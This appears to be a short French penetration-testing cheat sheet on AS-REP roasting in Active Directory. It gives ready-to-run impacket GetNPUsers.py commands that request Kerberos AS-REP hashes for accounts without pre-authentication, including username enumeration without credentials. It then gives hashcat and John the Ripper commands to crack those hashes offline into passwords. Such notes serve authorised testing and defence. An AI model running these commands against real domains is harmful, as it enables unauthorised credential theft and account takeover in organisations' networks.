AS-REP roasting

Si un utilisateur de domaine n’a pas activé la pré-authentification Kerberos, un AS-REP peut être demandé avec succès pour l’utilisateur, et un composant de la structure peut être cracké hors ligne.

Identifier les comptes vulnérables

Il est possible de lister les comptes vulnérables avec impacket de deux façons différents. Si nous possédons déjà un compte du domaine, nous pouvons interroger la base des utilisateurs via LDAP :

GetNPUsers.py -request -format hashcat -outputfile $OUTPUT_FILE -dc-ip $DC_IP "$DOMAIN/$USER:$PASS"

Si non, il est possible d’utiliser ce même outil avec un dictionnaire de noms d’utilisateurs afin d’énumérer sur celui-ci :

GetNPUsers.py -request -format hashcat -outputfile $OUTPUT_FILE -usersfile $USERS_FILE -dc-ip $DC_IP "$DOMAIN/" 

Casser le ticket

Si des utilisateurs sont effectivement vulnérable, il est alors possible de tenter de retrouver leur mot de passe grâce à hashcat ou john the ripper

# Avec Hashcat
hashcat -m 18200 -a 0 $HASHES $WORDLIST

# Avec John the Ripper
john --format=krb5asrep --wordlist=$WORDLIST $HASHES